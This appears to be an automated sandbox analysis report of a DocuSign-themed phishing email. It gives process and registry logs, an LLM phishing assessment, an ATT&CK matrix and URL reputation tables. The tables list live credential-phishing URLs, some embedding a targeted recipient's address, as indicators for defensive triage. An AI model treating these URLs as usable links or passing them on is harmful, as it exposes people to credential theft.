https://linkprotect.cudasvc.com/url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D&c=E,1,i0-TZ9sXrOnWu3n01gckjTjDlt13jbiHHHyOen1ztoOXCOTRFajJR67WUUfxHg4eD2yKNuMiH6kNQH7GWwT9vqakPcW-Xjgx6yxMACB_jKbE1i_F&typo=1\#Y2hpZ2xleUBsaXZlLXF1aW5uLmNvbQ==	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1924,i,5457991484249521891,2972132230705324861,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: c2r64.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32

Jump to behavior

Source: Google Drive.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Persistence and Installation Behavior

AI detected suspicious e-Mail

Source: e-Mail

LLM: Score: 8 Reasons: 1. The email impersonates well-known brands DocuSign and Microsoft, which are commonly targeted by phishing attacks. 2. The sender's email address (phil@qimacros.com) does not match the typical domain used by DocuSign or Microsoft, indicating potential spoofing. 3. The subject line and email body create a sense of urgency by stating 'Your documents have been completed' and prompting the recipient to 'VIEW COMPLETE DOCUMENTS'. 4. The button 'VIEW COMPLETE DOCUMENTS' is a common tactic used to induce clicks on potentially malicious links. 5. The email contains a security code and instructions to visit DocuSign.com, which could be legitimate, but the overall context and other indicators suggest caution. 6. The email includes a disclaimer about sharing the email and accessing the code, which is a common tactic to make the email appear more legitimate. 7. The presence of multiple links and a call to download an app increases the risk of phishing.

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Process Injection	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://shell.suite.office.com:1443	0%	URL Reputation	safe
https://autodiscover-s.outlook.com/	0%	URL Reputation	safe
https://useraudit.o365auditrealtimeingestion.manage.office.com	0%	URL Reputation	safe
https://outlook.office365.com/connectors	0%	URL Reputation	safe
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://lookup.onenote.com/lookup/geolocation/v1	0%	URL Reputation	safe
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://www.yammer.com	0%	URL Reputation	safe
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	0%	URL Reputation	safe
https://api.microsoftstream.com/api/	0%	URL Reputation	safe
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	0%	URL Reputation	safe
https://cr.office.com	0%	URL Reputation	safe
https://messagebroker.mobile.m365.svc.cloud.microsoft	0%	URL Reputation	safe
https://otelrules.svc.static.microsoft	0%	URL Reputation	safe
https://edge.skype.com/registrar/prod	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://tasks.office.com	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://edge.skype.com/rps	0%	URL Reputation	safe
https://messaging.engagement.office.com/	0%	URL Reputation	safe
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.powerbi.com/v1.0/myorg/groups	0%	URL Reputation	safe
https://web.microsoftstream.com/video/	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://graph.windows.net	0%	URL Reputation	safe
http://www.opensource.org/licenses/mit-license.php)	0%	URL Reputation	safe
https://consent.config.office.com/consentcheckin/v1.0/consents	0%	URL Reputation	safe
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	0%	URL Reputation	safe
https://safelinks.protection.outlook.com/api/GetPolicy	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	0%	URL Reputation	safe
http://weather.service.msn.com/data.aspx	0%	URL Reputation	safe
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	0%	URL Reputation	safe
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	0%	URL Reputation	safe
https://pushchannel.1drv.ms	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://clients.config.office.net/user/v1.0/ios	0%	URL Reputation	safe
https://api.addins.omex.office.net/api/addins/search	0%	URL Reputation	safe
https://outlook.office365.com/api/v1.0/me/Activities	0%	URL Reputation	safe
https://clients.config.office.net/user/v1.0/android/policies	0%	URL Reputation	safe
https://entitlement.diagnostics.office.com	0%	URL Reputation	safe
https://login.windows-ppe.net	0%	URL Reputation	safe
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	0%	URL Reputation	safe
https://outlook.office.com/	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
https://substrate.office.com/search/api/v1/SearchHistory	0%	URL Reputation	safe
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	0%	URL Reputation	safe
https://service.powerapps.com	0%	URL Reputation	safe
https://graph.windows.net/	0%	URL Reputation	safe
https://devnull.onenote.com	0%	URL Reputation	safe
https://messaging.office.com/	0%	URL Reputation	safe
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://messaging.action.office.com/setcampaignaction	0%	URL Reputation	safe
https://visio.uservoice.com/forums/368202-visio-on-devices	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://augloop.office.com	0%	URL Reputation	safe
https://api.diagnosticssdf.office.com/v2/file	0%	URL Reputation	safe
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory	0%	URL Reputation	safe
https://officepyservice.office.net/	0%	URL Reputation	safe
https://api.diagnostics.office.com	0%	URL Reputation	safe
https://store.office.de/addinstemplate	0%	URL Reputation	safe
https://wus2.pagecontentsync.	0%	URL Reputation	safe
https://api.powerbi.com/v1.0/myorg/datasets	0%	URL Reputation	safe
https://cortana.ai/api	0%	URL Reputation	safe
https://api.diagnosticssdf.office.com	0%	URL Reputation	safe
https://login.microsoftonline.com/	0%	URL Reputation	safe
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	0%	URL Reputation	safe
https://api.addins.omex.office.net/appinfo/query	0%	URL Reputation	safe
https://clients.config.office.net/user/v1.0/tenantassociationkey	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	0%	URL Reputation	safe
https://api.powerbi.com/v1.0/myorg/imports	0%	URL Reputation	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8	0%	Avira URL Cloud	safe
https://github.com/douglascrockford/JSON-js	0%	Avira URL Cloud	safe
https://my.microsoftpersonalcontent.com	0%	Avira URL Cloud	safe
http://github.com/jquery/globalize	0%	Avira URL Cloud	safe
https://d.docs.live.net	0%	Avira URL Cloud	safe
https://storage.live.com/clientlogs/uploadlocation	0%	Avira URL Cloud	safe
https://gaunited.org/?xhjvrczy&email=chigley@live-quinn.com	0%	Avira URL Cloud	safe
https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Ba=	0%	Avira URL Cloud	safe
https://support.docusign.com/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing	0%	Avira URL Cloud	safe
https://surosvis.top/?qrc=chigley%40live-quinn.com	100%	Avira URL Cloud	phishing
https://onedrive.live.com/embed?	0%	Avira URL Cloud	safe
https://api.cortana.ai	0%	Avira URL Cloud	safe
https://viptim.ro/tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs	0%	Avira URL Cloud	safe
https://www.docusign.com/features-and-benefits/mobile	0%	Avira URL Cloud	safe
https://surosvis.top/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
surosvis.top	180.131.145.90	true	true	unknown
challenges.cloudflare.com	104.17.3.184	true	false	unknown
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	unknown
www.google.com	216.58.206.68	true	false	unknown
gaunited.org	180.131.145.90	true	false	unknown
linkprotect.cudasvc.com	3.69.127.43	true	false	unknown
viptim.ro	104.21.50.212	true	false	unknown
FRA-efz.ms-acdc.office.com	52.98.179.146	true	false	unknown
trk.klclick3.com	108.156.60.30	true	false	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	unknown
r4.res.office365.com	unknown	unknown	false	unknown
aadcdn.msftauth.net	unknown	unknown	false	unknown
outlook.office365.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8	false	Avira URL Cloud: safe	unknown
